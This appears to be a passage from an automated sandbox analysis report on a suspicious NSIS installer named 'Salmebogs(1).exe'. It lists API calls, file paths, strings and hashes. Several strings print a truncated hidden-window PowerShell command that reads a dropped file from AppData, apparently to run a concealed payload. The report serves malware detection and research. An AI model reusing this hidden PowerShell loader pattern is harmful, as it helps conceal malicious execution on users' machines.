                                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034CF
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034D7
                                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034E8
                                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034F0
                                                                        • DeleteFileW.KERNELBASE(1033), ref: 00403504
                                                                          • Part of subcall function 0040602D: lstrcpynW.KERNEL32(?,?,00000400,0040332A,007A7A20,NSIS Error), ref: 0040603A
                                                                        • OleUninitialize.OLE32(?), ref: 004035CF
                                                                        • ExitProcess.KERNEL32 ref: 004035F0
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Salmebogs(1).exe",00000000,?), ref: 00403603
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Salmebogs(1).exe",00000000,?), ref: 00403612
                                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Salmebogs(1).exe",00000000,?), ref: 0040361D
                                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Salmebogs(1).exe",00000000,?), ref: 00403629
                                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403645
                                                                        • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk,?), ref: 0040369F
                                                                        • CopyFileW.KERNEL32(007B6800,0079F6E0,00000001), ref: 004036B3
                                                                        • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000), ref: 004036E0
                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040370F
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403716
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040372B
                                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 0040374E
                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403773
                                                                        • ExitProcess.KERNEL32 ref: 00403796
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                        • String ID: "C:\Users\user\Desktop\Salmebogs(1).exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede$C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk$~nsu
                                                                        • API String ID: 2488574733-938877965
                                                                        • Opcode ID: 5956b3787460f83b7212b5421b84639116ad83eee396059e0d99c42d7c302169
                                                                        • Instruction ID: 3536812e4df2a44c8c6b6ea5987ae19e001d2543839af4c9b3a673e139b837ac
                                                                        • Opcode Fuzzy Hash: 5956b3787460f83b7212b5421b84639116ad83eee396059e0d99c42d7c302169
                                                                        • Instruction Fuzzy Hash: 79D1E5B0500311ABD720AF659D45A3B3EADEF8074AF11443EF581B62D2DB7D8E458B2E

                                                                        Control-flow Graph (rendered graph for function 004052CB not reproduced; the API list follows)
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000403), ref: 00405329
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405338
                                                                        • GetClientRect.USER32(?,?), ref: 00405375
                                                                        • GetSystemMetrics.USER32(00000002), ref: 0040537C
                                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040539D
                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053AE
                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C1
                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053CF
                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053E2
                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405404
                                                                        • ShowWindow.USER32(?,00000008), ref: 00405418
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405439
                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405449
                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405462
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040546E
                                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405347
                                                                          • Part of subcall function 00404126: SendMessageW.USER32(00000028,?,00000001,00403F52), ref: 00404134
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040548B
                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_0000525F,00000000), ref: 00405499
                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004054A0
                                                                        • ShowWindow.USER32(00000000), ref: 004054C4
                                                                        • ShowWindow.USER32(?,00000008), ref: 004054C9
                                                                        • ShowWindow.USER32(00000008), ref: 00405513
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405547
                                                                        • CreatePopupMenu.USER32 ref: 00405558
                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040556C
                                                                        • GetWindowRect.USER32(?,?), ref: 0040558C
                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055A5
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055DD
                                                                        • OpenClipboard.USER32(00000000), ref: 004055ED
                                                                        • EmptyClipboard.USER32 ref: 004055F3
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055FF
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405609
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040561D
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040563D
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405648
                                                                        • CloseClipboard.USER32 ref: 0040564E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                        • String ID: {
                                                                        • API String ID: 590372296-366298937
                                                                        • Opcode ID: c972e23c5202b0790fa1fe1b116619d8512481b1e7d1e62b87371190ceff57bc
                                                                        • Instruction ID: 0168b2d80d6e582db7c5dd4f4bcf68d2cf71ae59161b6f31601be7c89a1652ed
                                                                        • Opcode Fuzzy Hash: c972e23c5202b0790fa1fe1b116619d8512481b1e7d1e62b87371190ceff57bc
                                                                        • Instruction Fuzzy Hash: 10B148B1800608FFDB119F64DD89EAF7B79FB49355F00802AFA41BA1A0CB785A51DF58

                                                                        Control-flow Graph (rendered graph for function 0040604F not reproduced; the API list follows)
                                                                        APIs
                                                                        • GetVersion.KERNEL32(00000000,Completed,?,004051C3,Completed,00000000,00000000,007953FF), ref: 00406112
                                                                        • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406190
                                                                        • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 004061A3
                                                                        • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061DF
                                                                        • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 004061ED
                                                                        • CoTaskMemFree.OLE32(?), ref: 004061F8
                                                                        • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040621C
                                                                        • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051C3,Completed,00000000,00000000,007953FF), ref: 00406276
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                        • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk
                                                                        • API String ID: 900638850-1393529567
                                                                        • Opcode ID: 798394cd79efbf8b9b83d6ae683917ff9149f8dcce4e50bc544776fb700d76f6
                                                                        • Instruction ID: 0ce2904226638d20c34e96b955086165c79dcecb48fb9e3347e4958dd658327d
                                                                        • Opcode Fuzzy Hash: 798394cd79efbf8b9b83d6ae683917ff9149f8dcce4e50bc544776fb700d76f6
                                                                        • Instruction Fuzzy Hash: 1E612271A00501AADF20AF64DC44BAE37A4AF45314F12C17FE553BA2D1DB3D8AA2CB4D
                                                                        APIs
                                                                        • FindFirstFileW.KERNELBASE(?,007A4F70,007A4728,00405B32,007A4728,007A4728,00000000,007A4728,007A4728, 4#v,?,C:\Users\user\AppData\Local\Temp\,0040583E,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 0040637B
                                                                        • FindClose.KERNEL32(00000000), ref: 00406387
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID: pOz
                                                                        • API String ID: 2295610775-1820424874
                                                                        APIs
                                                                        • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID:
                                                                        • API String ID: 1974802433-0

                                                                        Control-flow Graph (graph image omitted; nodes are marked Executed / Not Executed)
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C55
                                                                        • ShowWindow.USER32(?), ref: 00403C72
                                                                        • DestroyWindow.USER32 ref: 00403C86
                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CA2
                                                                        • GetDlgItem.USER32(?,?), ref: 00403CC3
                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CD7
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403CDE
                                                                        • GetDlgItem.USER32(?,00000001), ref: 00403D8C
                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403D96
                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00403DB0
                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E01
                                                                        • GetDlgItem.USER32(?,00000003), ref: 00403EA7
                                                                        • ShowWindow.USER32(00000000,?), ref: 00403EC8
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EDA
                                                                        • EnableWindow.USER32(?,?), ref: 00403EF5
                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F0B
                                                                        • EnableMenuItem.USER32(00000000), ref: 00403F12
                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F2A
                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F3D
                                                                        • lstrlenW.KERNEL32(007A1F20,?,007A1F20,007A7A20), ref: 00403F66
                                                                        • SetWindowTextW.USER32(?,007A1F20), ref: 00403F7A
                                                                        • ShowWindow.USER32(?,0000000A), ref: 004040AE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                        • String ID:
                                                                        • API String ID: 3282139019-0

                                                                        Control-flow Graph (graph image omitted; nodes are marked Executed / Not Executed)
                                                                        APIs
                                                                          • Part of subcall function 00406407: GetModuleHandleA.KERNEL32(?,00000020,?,004032E6,00000009), ref: 00406419
                                                                          • Part of subcall function 00406407: GetProcAddress.KERNEL32(00000000,?), ref: 00406434
                                                                        • lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Salmebogs(1).exe",00000000), ref: 004038F7
                                                                        • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,76233420), ref: 00403977
                                                                        • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 0040398A
                                                                        • GetFileAttributesW.KERNEL32(: Completed), ref: 00403995
                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede), ref: 004039DE
                                                                          • Part of subcall function 00405F74: wsprintfW.USER32 ref: 00405F81
                                                                        • RegisterClassW.USER32(007A79C0), ref: 00403A1B
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A33
                                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A68
                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403A9E
                                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403ACA
                                                                        • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403AD7
                                                                        • RegisterClassW.USER32(007A79C0), ref: 00403AE0
                                                                        • DialogBoxParamW.USER32(?,00000000,00403C19,00000000), ref: 00403AFF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: "C:\Users\user\Desktop\Salmebogs(1).exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                        • API String ID: 1975747703-2520745259

                                                                        Control-flow Graph (graph image omitted; nodes are marked Executed / Not Executed)
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00402DFF
                                                                        • GetModuleFileNameW.KERNEL32(00000000,007B6800,00000400,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00402E1B
                                                                          • Part of subcall function 00405C02: GetFileAttributesW.KERNELBASE(00000003,00402E2E,007B6800,80000000,00000003,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00405C06
                                                                          • Part of subcall function 00405C02: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00405C28
                                                                        • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,007B6800,007B6800,80000000,00000003,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00402E67
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                        • String ID: "C:\Users\user\Desktop\Salmebogs(1).exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                                                        • API String ID: 4283519449-3234192656
                                                                        • Opcode ID: 2230abfe47367ce911a851d27291f94f72d64689ba699b53d3264e4bd5f6c4f0
                                                                        • Instruction ID: 09a089d5f82a6c40e132a302aa9c698f597429127be3c6a0c4abd29db18ff3c5
                                                                        • Opcode Fuzzy Hash: 2230abfe47367ce911a851d27291f94f72d64689ba699b53d3264e4bd5f6c4f0
                                                                        • Instruction Fuzzy Hash: CE51E971901206ABDB109F64DE89B5E7BB8EF15394F20403BF904B62D1DBBC4D409B5D

                                                                        Control-flow Graph (graph image not reproduced)
                                                                        APIs
                                                                        • lstrcatW.KERNEL32(00000000,00000000,powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk,C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede,?,?,00000031), ref: 004017A8
                                                                        • CompareFileTime.KERNEL32(-00000014,?,powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk,powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk,00000000,00000000,powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk,C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede,?,?,00000031), ref: 004017CD
                                                                          • Part of subcall function 0040602D: lstrcpynW.KERNEL32(?,?,00000400,0040332A,007A7A20,NSIS Error), ref: 0040603A
                                                                          • Part of subcall function 0040518C: lstrlenW.KERNEL32(Completed,00000000,007953FF,762323A0,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C4
                                                                          • Part of subcall function 0040518C: lstrlenW.KERNEL32(00403168,Completed,00000000,007953FF,762323A0,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D4
                                                                          • Part of subcall function 0040518C: lstrcatW.KERNEL32(Completed,00403168,00403168,Completed,00000000,007953FF,762323A0), ref: 004051E7
                                                                          • Part of subcall function 0040518C: SetWindowTextW.USER32(Completed,Completed), ref: 004051F9
                                                                          • Part of subcall function 0040518C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040521F
                                                                          • Part of subcall function 0040518C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405239
                                                                          • Part of subcall function 0040518C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405247
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\sknserklringerne\antilapse.fel$C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede$powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk
                                                                        • API String ID: 1941528284-1192979168
                                                                        • Opcode ID: a5ea1d74589360650eecc12eae9d64c8bcc31512d10061facb43601c9a82ae87
                                                                        • Instruction ID: b6c518ac9409a037d84d2de051aa7ef8acb95708ad7dc08f543902d4715931a2
                                                                        • Opcode Fuzzy Hash: a5ea1d74589360650eecc12eae9d64c8bcc31512d10061facb43601c9a82ae87
                                                                        • Instruction Fuzzy Hash: 2241A571940515BACF20BFB5CC46DAF7675EF45329B20823BF422B10E2DB3C8A519A6D

                                                                        Control-flow Graph (graph image not reproduced)
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(Completed,00000000,007953FF,762323A0,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C4
                                                                        • lstrlenW.KERNEL32(00403168,Completed,00000000,007953FF,762323A0,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D4
                                                                        • lstrcatW.KERNEL32(Completed,00403168,00403168,Completed,00000000,007953FF,762323A0), ref: 004051E7
                                                                        • SetWindowTextW.USER32(Completed,Completed), ref: 004051F9
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040521F
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405239
                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405247
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                        • String ID: Completed
                                                                        • API String ID: 2531174081-3087654605
                                                                        • Opcode ID: baa22e3bb1d4b1fe90a2dc8523cea4daa0ee706f4726e05986a8d1993b39331c
                                                                        • Instruction ID: ba1fee82cce58728351fc00c71800df183ba28672b3cc7c2ac0788bec40afb87
                                                                        • Opcode Fuzzy Hash: baa22e3bb1d4b1fe90a2dc8523cea4daa0ee706f4726e05986a8d1993b39331c
                                                                        • Instruction Fuzzy Hash: F721AF71900558BACB119FA6DD44ACFBFB8EF85310F10807AF904B62A1C7794A40CFA8

                                                                        Control-flow Graph (graph image not reproduced)
                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063AE
                                                                        • wsprintfW.USER32 ref: 004063E9
                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004063FD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                        • String ID: %s%S.dll$UXTHEME$\
                                                                        • API String ID: 2200240437-1946221925
                                                                        • Opcode ID: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                        • Instruction ID: c9fa99885ad6dc82947e8769e1e813740631d6316ec4b329aa07ca863a8e6543
                                                                        • Opcode Fuzzy Hash: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                        • Instruction Fuzzy Hash: 6BF0F670510219A7DB10AB64DD0DF9A366CAB00304F10443ABA46F20E0EFB8DA79CBE8

                                                                        Control-flow Graph (graph image not reproduced)
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CountTick$wsprintf
                                                                        • String ID: ... %d%%
                                                                        • API String ID: 551687249-2449383134
                                                                        • Opcode ID: 64e3684ffa8c04dbafb980c2e948ff94a517c572883cec4c9b5d615e314ee73f
                                                                        • Instruction ID: 45afdf0c92a303c1fb6294b6805c2526d8a52aadf0d65962a881b974f50d995b
                                                                        • Opcode Fuzzy Hash: 64e3684ffa8c04dbafb980c2e948ff94a517c572883cec4c9b5d615e314ee73f
                                                                        • Instruction Fuzzy Hash: AA518C31801209EBCB10CFA5DA44B9F7BB8AF55766F1441BBE814B72C1D7788F508BA9

                                                                        Control-flow Graph (graph image not reproduced)
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00405C4F
                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",0040327B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 00405C6A
                                                                        Strings
                                                                        • "C:\Users\user\Desktop\Salmebogs(1).exe", xrefs: 00405C31
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C36
                                                                        • nsa, xrefs: 00405C3E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: "C:\Users\user\Desktop\Salmebogs(1).exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                        • API String ID: 1716503409-538229093
                                                                        • Opcode ID: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                        • Instruction ID: eddd0f9b3fe3e6878938fd53c549b869409703644024dbd16f9d2af4fdafb47c
                                                                        • Opcode Fuzzy Hash: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                        • Instruction Fuzzy Hash: D7F09076700708BFEB109F59DD05A9BB7BCEB91710F10403AFD01E7280E6B09E548B68

                                                                        Control-flow Graph for the function starting at 40237b (legend: Executed / Not Executed)
                                                                        APIs
                                                                        • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                        • lstrlenW.KERNEL32(0040B5A8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
